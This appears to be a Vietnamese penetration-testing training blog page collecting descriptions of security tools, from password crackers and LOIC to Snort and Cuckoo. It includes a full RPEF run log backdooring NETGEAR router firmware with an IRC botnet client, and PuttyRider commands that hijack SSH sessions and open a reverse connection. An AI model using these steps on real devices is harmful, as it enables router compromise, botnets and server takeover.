Thủ Phủ Hacker Mũ Trắng Buôn Ma Thuột

Chương trình Đào tạo Hacker Mũ Trắng Việt Nam tại Thành phố Buôn Ma Thuột kết hợp du lịch. Khi đi là newbie - Khi về là HACKER MŨ TRẮNG !

Hacking Và Penetration Test Với Metasploit

Chương trình huấn luyện sử dụng Metasploit Framework để Tấn Công Thử Nghiệm hay Hacking của Security365.

Tài Liệu Computer Forensic Của C50

Tài liệu học tập về Truy Tìm Chứng Cứ Số (CHFI) do Security365 biên soạn phục vụ cho công tác đào tạo tại C50.

Sinh Viên Với Hacking Và Bảo Mật Thông Tin

Cuộc thi sinh viên cới Hacking. Với các thử thách tấn công trang web dành cho sinh viên trên nền Hackademic Challenge.

Tấn Công Và Phòng Thủ Với BackTrack / Kali Linux

Khóa học tấn công và phòng thủ với bộ công cụ chuyên nghiệp của các Hacker là BackTrack và Kali LINUX dựa trên nội dung Offensive Security

Sayfalar

RPEF - Abstracts and expedites the process of backdooring stock firmware images for consumer/SOHO routers


Router Post-Exploitation Framework

Currently, the framework includes a number of firmware image modules:
'Verified'   - This module is confirmed to work and is stable.

'Unverified' - This module is believed to work or should work with
little additional effort, but awaits being tested on a
physical device.

'Testing' - This module is currently undergoing development and is
unstable for the time being. Users should consider this
module a "work in progress."

'Roadblock' - Issues have halted progress on this module for the time
being. Certain unavailable utilities or significant
reverse engineering work may be necessary.
For a list of options, run:
./rpef.py -h
For a list of all currently supported firmware targets, run:
./rpef.py -ll

The script is written for Python 2.6 and may require the installation of a few modules. It is typically invoked as:
./rpef.py <firmware image> <output file> <payload>
and accepts a number of optional switches (see -h).
The rules/ directory stores a hierarchy of rules// directories. One module correlates to one firmware checksum (not to one specific router) since multiple routers have been observed to run the exact same firmware. Within each module is properties.json which stores the language and order of operations necessary to unpackage, backdoor, and repackage the target firmware image. The payloads/ directory stores cross-compiled binaries ready for deployment, and the optional dependencies/ directory stores miscellaneous files to aid the process.
The utilities/ directory stores pre-compiled x86 binaries to perform tasks such as packing/unpacking filesystems, compressing/decompressing data (for which no suitable .py module exists), and calculating checksums.
The payloads_src/ directory stores source code for the payloads themselves. All payloads are written from scratch to keep them as small as possible.

Usage

To verbosely generate a firmware image for the WGR614v9 backdoored with a botnet client, run:
./rpef.py WGR614v9-V1.2.30_41.0.44NA.chk WGR614v9-V1.2.30_41.0.44NA_botnet.chk botnet -v
And the process should proceed as follows:
$ ./rpef.py WGR614v9-V1.2.30_41.0.44NA.chk WGR614v9-V1.2.30_41.0.44NA_botnet.chk botnet -v
[+] Verifying checksum
Calculated checksum: 767c962037b32a5e800c3ff94a45e85e
Matched target: NETGEAR WGR614v9 1.2.30NA (Verified)
[+] Extracting parts from firmware image
Step 1: Extract WGR614v9-V1.2.30_41.0.44NA.chk, Offset 58, Size 456708 -> /tmp/tmpOaw1tn/headerkernel.bin
Step 2: Extract WGR614v9-V1.2.30_41.0.44NA.chk, Offset 456766, Size 1476831 -> /tmp/tmpOaw1tn/filesystem.bin
[+] Unpacking filesystem
Step 1: unsquashfs-1.0 /tmp/tmpOaw1tn/filesystem.bin -> /tmp/tmpOaw1tn/extracted_fs
Executing: utilities/unsquashfs-1.0 -dest /tmp/tmpOaw1tn/extracted_fs /tmp/tmpOaw1tn/filesystem.bin

created 217 files
created 27 directories
created 48 symlinks
created 0 devices
created 0 fifos
[+] Inserting payload
Step 1: Rm /tmp/tmpOaw1tn/extracted_fs/lib/modules/2.4.20/kernel/net/ipv4/opendns/openDNS_hijack.o
Step 2: Copy rules/NETGEAR/WGR614v9_1.2.30NA/payloads/botnet /tmp/tmpOaw1tn/extracted_fs/usr/sbin/botnet
Step 3: Move /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd.bak
Step 4: Touch /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
Step 5: Appendtext "#!/bin/msh
" >> /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
[+] INPUT REQUIRED, IP address of IRC server: 1.2.3.4
[+] INPUT REQUIRED, Port of IRC server: 6667
[+] INPUT REQUIRED, Channel to join (include #): #hax
[+] INPUT REQUIRED, Prefix of bot nick: toteawesome
Step 6: Appendtext "/usr/sbin/botnet 1.2.3.4 6667 \#hax toteawesome &
" >> /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
Step 7: Appendtext "/usr/sbin/httpd.bak
" >> /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
Step 8: Chmod 777 /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
[+] Building filesystem
Step 1: mksquashfs-2.1 /tmp/tmpOaw1tn/extracted_fs, Blocksize 65536, Little endian -> /tmp/tmpOaw1tn/newfs.bin
Executing: utilities/mksquashfs-2.1 /tmp/tmpOaw1tn/extracted_fs /tmp/tmpOaw1tn/newfs.bin -b 65536 -root-owned -le
Creating little endian 2.1 filesystem on /tmp/tmpOaw1tn/newfs.bin, block size 65536.

Little endian filesystem, data block size 65536, compressed data, compressed metadata, compressed fragments
Filesystem size 1442.99 Kbytes (1.41 Mbytes)
29.38% of uncompressed filesystem size (4912.18 Kbytes)
Inode table size 2245 bytes (2.19 Kbytes)
33.63% of uncompressed inode table size (6675 bytes)
Directory table size 2322 bytes (2.27 Kbytes)
55.26% of uncompressed directory table size (4202 bytes)
Number of duplicate files found 3
Number of inodes 293
Number of files 218
Number of fragments 22
Number of symbolic links 48
Number of device nodes 0
Number of fifo nodes 0
Number of socket nodes 0
Number of directories 27
Number of uids 1
root (0)
Number of gids 0
[+] Gluing parts together
Step 1: Touch WGR614v9-V1.2.30_41.0.44NA_botnet.chk
Step 2: Appendfile /tmp/tmpOaw1tn/headerkernel.bin >> WGR614v9-V1.2.30_41.0.44NA_botnet.chk
Step 3: Appendfile /tmp/tmpOaw1tn/newfs.bin >> WGR614v9-V1.2.30_41.0.44NA_botnet.chk
[+] Padding image with null bytes
Step 1: Pad WGR614v9-V1.2.30_41.0.44NA_botnet.chk to size 1937408 with 0 (0x00)
[+] Generating CHK header
Step 1: packet WGR614v9-V1.2.30_41.0.44NA_botnet.chk rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/compatible_NA.txt rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/ambitCfg.h
Executing: utilities/packet -k WGR614v9-V1.2.30_41.0.44NA_botnet.chk -b rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/compatible_NA.txt -i rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/ambitCfg.h
[+] Removing temporary files
Step 1: Rmdir /tmp/tmpOaw1tn/


USBPcap - USB Packet capture for Windows (open-source USB Sniffer for Windows)


USBPcap is an open-source USB sniffer for Windows.

USB Packet capture for Windows Tour

CeWL - Custom WordList Generator Tool for Password Cracking

CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.

CeWL also has an associated command line app, FAB (Files Already Bagged) which uses the same meta data extraction techniques to create author/creator lists from already downloaded.

Usage
cewl [OPTION] ... URL
--help, -h
Show help
--depth x, -d x
The depth to spider to, default 2
--min_word_length, -m
The minimum word length, this strips out all words under the specified length, default 3
--offsite, -o
By default, the spider will only visit the site specified. With this option it will also visit external sites
--write, -w file
Write the ouput to the file rather than to stdout
--ua, -u user-agent
Change the user agent
-v
Verbose, show debug and extra output
--no-words, -n
Don't output the wordlist
--meta, -a file
Include meta data, optional output file
--email, -e file
Include email addresses, optional output file
--meta_file file
Filename for metadata output
--email_file file
Filename for email output
--meta-temp-dir directory
The directory used used by exiftool when parsing files, the default is /tmp
--count, -c:
Show the count for each of the words found
--auth_type
Digest or basic
--auth_user
Authentication username
--auth_pass
Authentication password
--proxy_host
Proxy host
--proxy_port
Proxy port, default 8080
--proxy_username
Username for proxy, if required
--proxy_password
Password for proxy, if required
--verbose, -v
Verbose
URL
The site to spider.


Change Log
Keeping track of history.
  • Version 4.3 - Various spider bug fixes and the introduction of the sorting the results by count
  • Version 4.2 - Fixed the Spider gem by overriding the function, also handling #name links correctly
  • Version 4.1 - Small bug fixes and added new parameter to set filenames for email and metadata output
  • Version 4 - Runs with Ruby 1.9.x and grabs text out of alt and title tags
  • Version 3 - Now spiders pages referenced in JavaScript location commands
  • Version 2.2 - Data from email addresses and meta data can be written to their own files
  • Version 2.1 - Fixed a bug some people were having while using the email option
  • Version 2 - Added meta data support
  • Version 1 - released

John the Ripper 1.8.0-jumbo-1 - Fast Password Cracker


John the Ripper is a free password cracking software tool. Initially developed for the Unix operating system, it now runs on fifteen different platforms (eleven of which are architecture-specific versions of Unix, DOS, Win32, BeOS, and OpenVMS). It is one of the most popular password testing and breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix versions (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, MySQL, and others.

John the Ripper 1.8.0-jumbo-1 is based on today’s code from the bleeding-jumbo branch on GitHub, which we’ve tried to make somewhat stable lately in preparation for this release.

You may notice that the source code archive size has increased from under 2 MB to over 20 MB. This is primarily due to the included .chr files, which are both bigger and more numerous than pre-1.8 ones. There are lots of source code additions, too.

In fact:

This is probably the biggest single jumbo update so far. The changes are too numerous to summarize – unfortunately, we haven’t been doing that during development, and it’d be a substantial effort to do it now, delaying the release to next year. So we chose to go ahead and release whatever we’ve got. (Of course, there are the many commit messages -but that’s not a summary.)

A really brief summary, though, is that there are new “formats” (meaning more supported hash and “non-hash” types, both on CPU and on GPU), various enhancements to existing ones, mask mode, better support for non-ASCII character sets, and of course all of 1.8.0’s features (including –fork and –node). And new bugs. Oh, and we’re now using autoconf, meaning that you need to “./configure” and “make”, with all the usual pros and cons of this approach. There’s a Makefile.legacy included, so you may “make -f Makefile.legacy” to try and build JtR the old way if you refuse to use autoconf… for now…and this _might_ even work… but you’d better bite the bullet. (BTW, I have no current plans on autoconf’ing non-jumbo versions of JtR.)

Due to autoconf, things such as OpenMP and OpenCL are now enabled automatically (if system support for them is detected during build). When this is undesirable, you may use e.g. “./configure –disable-openmp” or “./configure –disable-openmp-for-fast-formats” and run with –fork to achieve a higher cumulative c/s rate across the fork’ed processes.

Out of over 4800 commits since 1.7.9-jumbo-7, over 2600 are by magnum, making him the top contributor. Other prolific contributors are JimF, Dhiru Kholia, Claudio Andre, Frank Dittrich, Sayantan Datta.

There are also multiple commits by (or attributed to) Lukas Odzioba, ShaneQful, Alexander Cherepanov, rofl0r, bwall, Narendra Kangralkar, Tavis Ormandy, Spiros Fraganastasis, Harrison Neal, Vlatko Kosturjak, Aleksey Cherepanov, Jeremi Gosney, junmuz, Thiebaud Weksteen, Sanju Kholia, Michael Samuel, Deepika Dutta, Costin Enache, Nicolas Collignon, Michael Ledford. There are single commits by (or attributed to) many other contributors as well (including even one by atom of hashcat).


PuttyRider - Hijack Putty sessions in order to sniff conversation and inject Linux commands


PuttyRider injects a DLL into a running putty.exe process in order to sniff all communication and inject Linux commands on the remote server.

This can be useful in an internal penetration test when you already have access to a sysadmin’s machine who has a Putty session open to a Linux server. You can use PuttyRider to take control of the remote server using the existing SSH session.

The tool has been recently presented at Defcamp 2014 – a security conference in Romania.


Examples 
List existing Putty processes and their status (injected / not injected)
PuttyRider.exe -l
Inject DLL into the first found putty.exe and initiate a reverse connection from DLL to my IP:Port, then exit PuttyRider.exe.
PuttyRider.exe -p 0 -r 192.168.0.55:8080
Run in background and wait for new Putty processes. Inject in any new putty.exe and write all conversations in local files.
PuttyRider.exe -w -f
Eject PuttyRider.dll from all Putty processes where it is already injected. (Don't forget to kill PuttyRider.exe if running in -w mode, otherwise it will reinject again.)
PuttyRider.exe -x

Usage
Operation modes:
-l List the running Putty processes and their connections
-w Inject in all existing Putty sessions and wait for new sessions
to inject in those also
-p PID Inject only in existing Putty session identified by PID.
If PID==0, inject in the first Putty found
-x Cleanup. Remove the DLL from all running Putty instances
-d Debug mode. Only works with -p mode
-c CMD Automatically execute a Linux command after successful injection
PuttyRider will remove trailing spaces and '&' character from CMD
PuttyRider will add: " 1>/dev/null 2>/dev/null &" to CMD
-h Print this help

Output modes:
-f Write all Putty conversation to a file in the local directory.
The filename will have the PID of current putty.exe appended
-r IP:PORT Initiate a reverse connection to the specified machine and
start an interactive session.

Interactive commands (after you receive a reverse connection):
!status See if the Putty window is connected to user input
!discon Disconnect the main Putty window so it won't display anything
This is useful to send commands without the user to notice
!recon Reconnect the Putty window to its normal operation mode
CMD Linux shell commands
!exit Terminate this connection
!help Display help for client connection


Windows Password Kracker - Free Windows Password Recovery Software



Windows Password Kracker is a free software to recover the lost or forgotten Windows password. It can quickly recover the original windows password from either LM (LAN Manager) or NTLM (NT LAN Manager) Hash.

Windows encrypts the login password using LM or NTLM hash algorithm. Since these are one way hash algorithms we cannot directly decrypt the hash to get back the original password. In such cases 'Windows Password Kracker' can help in recovering the windows password using the simple dictionary crack method.

Before that you need to dump the password hashes from live or remote windows system using pwdump tool (more details below). Then feed the hash (LM/NTLM) for the corresponding user into 'Windows Password Kracker' to recover the password for that user.

In forensic scenarios, investigator can dump the hashes from the live/offline system and then crack it using 'Windows Password Kracker' to recover the original password. This is very crucial as such a password can then be used to decrypt stored credentials as well as encrypted volumes on that system.

'Windows Password Kracker' uses simple & quicker Dictionary based password recovery technique. By default it comes with sample password file. However you can find good collection of password dictionaries (also called wordlist) here & here.

Though it supports only Dictionary Crack method, you can easily use tools like Crunch, Cupp to generate brute-force based or any custom password list file and then use it with 'Windows Password Kracker'.

It works on both 32 bit & 64 bit windows systems starting from Windows XP to Windows 8.


Snort 3.0 - Network intrusion prevention and detection system (IDS/IPS)


Snort is the most powerful IPS in the world, setting the standard for intrusion detection. So when we started thinking about what the next generation of IPS looked like we started from scratch.

Features
  • Support multiple packet processing threads
  • Shared configuration and attribute table
  • Use a simple, scriptable configuration
  • Make key components pluggable
  • Autodetect services for portless configuration
  • Support sticky buffers in rules
  • Autogenerate reference documentation
  • Provide better cross platform support

LOIC 1.0.8 (Low Orbit Ion Cannon) - A network stress testing application


Low Orbit Ion Cannon (LOIC) is an open source network stress testing and denial-of-service attack application, written in C#. LOIC was initially developed by Praetox Technologies, but was later released into the public domain, and now is hosted on several open source platforms.

LOIC performs a denial-of-service (DoS) attack (or when used by multiple individuals, a DDoS attack) on a target site by flooding the server with TCP or UDP packets with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets. The software inspired the creation of an independent JavaScript version called JS LOIC, as well as LOIC-derived web version called Low Orbit Web Cannon. These enable a DoS from a web browser.


Android Studio - The official Android IDE


Android Studio is the official IDE for Android application development, based on IntelliJ IDEA. On top of the capabilities you expect from IntelliJ, Android Studio offers:
  • Flexible Gradle-based build system
  • Build variants and multiple apk file generation
  • Code templates to help you build common app features
  • Rich layout editor with support for drag and drop theme editing
  • Lint tools to catch performance, usability, version compatibility, and other problems
  • ProGuard and app-signing capabilities
  • Built-in support for Google Cloud Platform, making it easy to integrate Google Cloud Messaging and App Engine
  • And much more

Intelligent code editor
At the core of Android Studio is an intelligent code editor capable of advanced code completion, refactoring, and code analysis.
The powerful code editor helps you be a more productive Android app developer.

Code templates and GitHub integration
New project wizards make it easier than ever to start a new project.
Start projects using template code for patterns such as navigation drawer and view pagers, and even import Google code samples from GitHub.

Multi-screen app development
Build apps for Android phones, tablets, Android Wear, Android TV, Android Auto and Google Glass.
With the new Android Project View and module support in Android Studio, it's easier to manage app projects and resources.

Virtual devices for all shapes and sizes
Android Studio comes pre-configured with an optimized emulator image.
The updated and streamlined Virtual Device Manager provides pre-defined device profiles for common Android devices.

Android builds evolved, with Gradle
Create multiple APKs for your Android app with different features using the same project.
Manage app dependencies with Maven.
Build APKs from Android Studio or the command line.


THC-SmartBrute - Finds undocumented and secret commands implemented in a smartcard


This tool finds undocumented and secret commands implemented in a smartcard. An instruction is divided into Class (CLA), Instruction-Number (INS) and the parameters or arguments P1, P2, P3. THC-SMARTBRUTE iterates through all the possible values of CLA and INS to find a valid combination.

Furthermore it tries to find out what parameters are valid for a given class and instruction number.

Requirements

You need a PC/SC compatible smartcard reader that is supported by the PCSC-LITE library.
A list of supported devices can be found here
THC-SMARTBRUTE was developped with the XXX smartcard reader.

Command line arguments
--verbose
prints a lot of debugging messages to stderr *FIXME*
--undoconly
only prints found instruction if its not element of the standard
instruction list
--fastresults
before iterating through all possible combinates of class and
instruction-number typical class/instruction-values are verified for
availability.
After that the classes 0x00, 0x80 and 0xA0 (GSM) are tried first.
--help
prints out the usage
--chv1 pin1
a VERIFY CHV1 instruction with pin1 as argument is executed
--chv2 pin2
a VERIFY CHV2 instruction with pin2 as argument is executed

--brutep1p2
finds valid parameter p1 and p2 combinations for the instruction
the user defined with --cla and --ins .
For parameter p1 the value 0x00 is assumed.

--brutep3
find valid p3 values for given --cla, --ins, --p1 and --p2

--cla CLASS
sets the instruction class to CLASS
--ins INS
sets the instruction-number to INS
--p1 P1
sets parameter p1 to P1
--p2 P2
sets parameter p2 to P2
--p3 P3
sets parameter p3 to P3

Examples
1. ~$ ./thc-smartbrute
run thcsmartbrute without any arguments to brute force for valid instructions
2. ~$ ./thc-smartbrute --undoconly
find valid instructions but only print out non-standard instructions

3. ~$ ./thc-smartbrute --cla 0xA0 --ins 0xA4 --brutep1p2
find the first two arguments for the GSM instruction SELECT FILE

4. ~$ ./thc-smartbrute --cla 0xA0 --ins 0xA4 --p1 0x00 --p2 0x00 --brutep3
find the 3rd argument for the already found first two arguments
for the GSM instruction SELECT FILE


AutoScan-Network - Automatically scan your network


AutoScan-Network is a network scanner (discovering and managing application). No configuration is required to scan your network. The main goal is to print the list of connected equipments in your network.

System Requirements :
•Mac OS X 10.5 or later
•Microsoft Windows (XP, Vista)
•GNU/Linux
•Maemo 4
•Sun OpenSolaris

Features:
• Fast network scanner
 • Automatic network discovery
 • TCP/IP scanner
 • Wake on lan functionality
 • Multi-threaded Scanner
 • Port scanner
 • Low surcharge on the network
 • VNC Client
 • Telnet Client
 • SNMP scanner
 • Simultaneous subnetworks scans without human intervention
 • Realtime detection of any connected equipment
 • Supervision of any equipment (router, server, firewall...)
 • Supervision of any network service (smtp, http, pop, ...)
 • Automatic detection of known operatic system (brand and version), you can also add any unknown equipment to the database
 • The graphical interface can connect one or more scanner agents (local or remote)
 • Scanner agents could be deployed all over the network to scan through any type of equipment (router, NAT, etc)
 • Network Intruders detection (in intruders detection mode, all new equipments blacklisted)
 • Complete network tree can be saved in a XML file.
 • Privileged account is not required


THC-Hydra 8.1 - Network Logon Cracker

 A very fast network logon cracker which support many different services.

See feature sets and services coverage page - incl. a speed comparison against ncrack and medusa.Number one of the biggest security holes are passwords, as every password security study shows.

This tool is a proof of concept code, to give researchers and security consultants the possiblity to show how easy it would be to gain unauthorized access from remote to a system.

There are already several login hacker tools available, however none does either support more than one protocol to attack or support parallized connects.

It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and OSX.

Currently this tool supports the following protocols:
Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

CHANGELOG for 8.1
        ! Development moved to a public github repository: https://github.com/vanhauser-thc/thc-hydra

* David Maciejak, my co-maintainer moved to a different job and country and can not help with Hydra anymore - sadly! Wish you all the best!
* Added patch from Ander Juaristi which adds h/H header options for http-form-*, great work, thanks!
* Found login:password combinations are now printed with the name specified (hostname or IP), not always IP
* Fixed the -M option, works now with many many targets :-)
* -M option now supports ports, add a colon in between: "host:port", or, if IPv6, "[ipv6ipaddress]:port"
* Fixed for cisco-enable if an intial Login/Password is used (thanks to joswr1te for reporting)
* Added patch by tux-mind for better MySQL compilation and an Android patches and Makefile. Thanks!
* Added xhydra gtk patches by Petar Kaleychev to support -h, -U, -f, -F, -q and -e r options, thanks!
* Added patch for teamspeak to better identify server errors and auth failures (thanks to Petar Kaleychev)
* Fixed a crash in the cisco module (thanks to Anatoly Mamaev for reporting)
* Small fix for HTTP form module for redirect pages where a S= string match would not work (thanks to mkosmach for reporting)
* Updated configure to detect subversion packages on current Cygwin
* Fixed RDP module to support the port option (thanks to and.enshin(at)gmail.com)


zANTI 2.0 - Android Network Toolkit


zANTI is a mobile penetration testing toolkit that lets security managers assess the risk level of a network with the push of a button. This easy to use mobile toolkit enables IT Security Administrators to simulate an advanced attacker to identify the malicious techniques they use in the wild to compromise the corporate network.

Scan

Uncover authentication, backdoor, and brute-force attacks, DNS and protocol-specific attacks and rogue access points using a comprehensive range of full customizable network reconnaissance scans.

Diagnose

Enable Security Officers to easily evaluate an organization’s network and automatically diagnose vulnerabilities within mobile devices or web sites using a host of penetration tests including, man-in-the-Middle (MITM), password cracking and metasploit.

Report

Highlight security gaps in your existing network and mobile defenses and report the results with advanced cloud-based reporting through zConsole. zANTI mirrors the methods a cyber-attacker can use to identify security holes within your network. Dash-board reporting enables businesses to see the risks and take appropriate corrective actions to fix critical security issues.


Samurai Web Testing Framework 3.0 - LiveCD Web Pen-testing Environment


The Samurai project team is happy to announce the release of a development version of the Samurai Web Testing Framework. This release is currently a fully functional linux environment that has a number of the tools pre-installed. Our hope is that people who are interested in making this the best live CD for web testing will provide feedback for what they would like to see included on the CD.

The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool selection on the tools we use in our security practice. We have included the tools used in all four steps of a web pen-test.
Starting with reconnaissance, we have included tools such as the Fierce domain scanner and Maltego. For mapping, we have included tools such WebScarab and ratproxy. We then chose tools for discovery. These would include w3af and burp. For exploitation, the final stage, we included BeEF, AJAXShell and much more. This CD also includes a pre-configured wiki, set up to be the central information store during your pen-test.

Tools
  • – recon-­‐ng
  • – w3af
  • – BeEF
  • – Burp
  •  – OWASP
  • – Rat
  • – DirBuster
  • – CeWL
  • Sqlmap
  • – Maltego
  • – WebScarab
  • – Nmap
  • - Zenmap
  • – Nikto
  • Metasploit
  • – Firefox
  • – Tilt
  • – Wappalyzer
  • – FoxyProxy
  • – ZAP
  • – Firebug
  • – ZAP
  • – Burp
  •  – Nikto
  • – DirBuster
  • – RaJ
  • – ZAP
  • – w3af
  • – iMacro
  • – CeWL
  • – ZAP
  • – ZAP TokenGen
  • – Burpsuite Sequencer
  • – User Agent Switcher
  • – Cookies
  • – Laudanum
  • – BeEF 


Hash Manager - Recovering passwords to hashes


The software is designed for recovering passwords to hashes, and it features the following:
  • Supports over 330 hashing algorithms.
  • Contains over 50 additional utilities for handling hashes, passwords, and dictionaries.
  • Unlimited loadable hashes, dictionaries, rules, and masks.
  • Multithreading.
  • 64 bits.
  • Maximum optimization for working with large hash lists.
  • Maximum optimization for working with dictionaries.
  • Optimization for newest CPU.
  • Hashing modules as stand-alone DLL files.
  • Convenient control over operation using command files.
  • HEX user names and salts.
  • Recovery of Unicode passwords.
  • And much more.

Changelog:

Version 1.1.
- Added the hybrid attack (AttackMode=4).
- Added new hashing module: PBKDF2 SHA-256(2) - Some bugs fixed.


Version 1.1.1.
- Significantly speeded up all modules using the SHA-1 algorithm.


Version 1.1.2.
- Added new hashing modules:
sha256(md5($pass).$salt)
sha256(sha1($pass).$salt)
PBKDF2 SHA-256(3)


- Added new tools:
ValidateRules
IsOutputFile
RemoveLines


Version 1.1.3.
- Added new hashing modules:
substr(sha1($pass),0,38)
SHA-1(Linkedin)
PBKDF2 JIRA
Blake-224
Blake-256
Blake-384
Blake-512
md5(md5(md5($pass)).$salt)

- Added new PBKDF2 hashing modules.
- Added 14 hashing modules with no specific information where exactly they are used, so we called them Custom(x).dll 


Version 1.1.4.
In the new version:
- Added new hashing modules:
Panama
MD4(Round 1)
BlackBerry ES v10
MongoDB(1)
MongoDB(2)

- Added new tools:
ReverseLines
SwapBytes
HexToBin
BinToHex

CalculateChecksum - supports CRC-64, MD5, and SHA-1.
- Added new dictionary: "Top10000.dic". 




Isowall - A mini-firewall that completely isolates a target device from the local network


This is a mini-firewall that completely isolates a target device from the local network. This is for allowing infected machines Internet access, but without endangering the local network.

Building

This project depends upon libpcap, and of course a C compiler.
On Debian, the following should work:
# apt-get install git gcc make libpcap-dev
# git clone https://github.com/robertdavidgraham/isowall
# cd isowall
# make

This will put the binary isowall in the local isowall/bin directory.
This should also work on Windows, Mac OS X, xBSD, and pretty much any operating system that supports libpcap.

Running

First, setup a machine with three network interfaces.

The first network interface (like eth0) will be configured as normal, with a TCP/IP stack, so that you can SSH to it.

The other two network interfaces should have no TCP/IP stack, no IP address, no anything. This is the most important configuration step, and the most common thing you'll get wrong. For example, the DHCP software on the box may be configured to automatically send out DHCP requests on these additional interfaces. You have to go fix that so nothing is bound to these interfaces.

To run, simply type:
# ./bin/isowall --internal eth1 --external eth2 -c xxxx.conf

where xxxx.conf contains your configuration, which is described below.

Configuration

The following shows a typical configuration file.
internal = eth1
internal.target.ip = 10.0.0.129
internal.target.mac = 02:60:8c:37:87:f3

external = eth2
external.router.ip = 10.0.0.1
external.router.mac = 66:55:44:33:22:11

allow = 0.0.0.0/0
block = 192.168.0.0/16
block = 10.0.0.0/8
block = 224.0.0.0-255.255.255.255


The target device we are isolating has the indicated IP and MAC address.

Only IPv4 and ARP packets are passed.

Outbound packets must have the following conditions:
  • source MAC address equal to internal.target.mac
  • destination MAC address equal to external.router.mac
  • EtherType of 0x800 or 0x806
  • source IPv4 address equal to internal.target.ip
  • destination IPv4 address within an allow range, but not in a block range
  • if an ARP packet, then the destination IPv4 address must equal that external.router.ip
  • if an ARP packet, must be a "request"

Inbound packets must have the following conditions:
  • destination MAC address equal to internal.target.mac
  • source MAC address equal to external.router.mac
  • EtherType of 0x800 or 0x806
  • destination IPv4 address equal to internal.target.ip
  • source IPv4 address within an allow range, but not in a block range
  • if an ARP packet, then the source IPv4 address must equal that external.router.ip
  • if an ARP packet, then must be a "reply"

CuckooAutoInstall - Auto Installer Script for Cuckoo Sandbox



What is Cuckoo Sandbox?
In three words, Cuckoo Sandbox is a malware analysis system.

What does that mean?
It simply means that you can throw any suspicious file at it and in a matter of seconds Cuckoo will provide you back some detailed results outlining what such file did when executed inside an isolated environment.

CuckooAutoInstall was created to avoid wasting time installing Cuckoo Sandbox in Debian Stable.

Usage
  • Execute the script: sh cuckooautoinstall.sh
  • Add a password for the user 'cuckoo' created by the script. Use: passwd cuckoo command.
  • Create the virtual machines http://docs.cuckoosandbox.org/en/latest/installation/guest/ or import virtual machines using VBoxManage import virtual_machine.ova
  • Add to the virtual machines with HostOnly option using vboxnet0: vboxmanage modifyvm “virtual_machine" --hostonlyadapter1 vboxnet0 (use this command to list the VMs: VBoxManage list vms)
  • Configure cuckoo: cuckoo/conf/cuckoo.conf, cuckoo/conf/auxiliary.conf & cuckoo/conf/virtualbox.conf
  • Execute cuckoo (check the image output): cd cuckoo && python cuckoo.py
  • Execute also webpy (default port 8080): cd cuckoo/utils && python web.py
  • Execute also django using port 6969: cd cuckoo/web && python manage.py runserver 0.0.0.0:6969

Script features 
It installs by default Cuckoo sandbox with the ALL optional stuff: yara, ssdeep, django ...
It installs the last versions of: ssdeep, yara, pydeep-master & jansson.
It tries to solve common problems during the installation: ldconfigs, autoreconfs...
It installs by default virtualbox and creates the hostonlyif.
It creates the iptables rules and the ip forward to enable internet in the cuckoo virtual machines:
sudo iptables -A FORWARD -o eth0 -i vboxnet0 -s 192.168.56.0/24 -m conntrack --ctstate NEW -j ACCEPT
sudo iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
sudo iptables -A POSTROUTING -t nat -j MASQUERADE
sudo sysctl -w net.ipv4.ip_forward=1

It enables run tcpdump from nonroot user:
sudo apt-get -y install libcap2-bin
sudo setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump

It creates the 'cuckoo' user in the system and it is also added this user to vboxusers group.
It enables mongodb in conf/reporting.conf
It fix the "TEMPLATE_DIRS setting must be a tuple" error when running python manage.py from the DJANGO version >= 1.6. Replacing in web/web/settings.py:
    TEMPLATE_DIRS = (
"templates"
)
For:
TEMPLATE_DIRS = (
("templates"),
)


LinEnum - Local Linux Enumeration & Privilege Escalation Checks


LinEnum will automate many of the checks that I’ve documented in the Local Linux Enumeration & Privilege Escalation Cheatsheet. It’s a very basic shell script that performs over 65 checks, getting anything from kernel information to locating possible escalation points such as potentially useful SUID/GUID files and Sudo/rhost mis-configurations and more.

An additional ‘extra’ feature is that the script will also use a provided keyword to search through *.conf and *.log files. Any matches will be displayed along with the full file path and line number on which the keyword was identified.

After the scan has completed (please be aware that it make take some time) you’ll be presented with (possibly quite extensive) output, to which any key findings will be highlighted in yellow with everything else documented under the relevant headings.

Below is a high-level summary of the checks/tasks performed by LinEnum:
  • Kernel and distribution release details
  • System Information:
    • Hostname
    • Networking details:
      • Current IP
      • Default route details
      • DNS server information
  • User Information:
    • Current user details
    • Last logged on users
    • Llist all users including uid/gid information
    • List root accounts
    • Extract full details for ‘default’ uid’s such as 0, 1000, 1001 etc
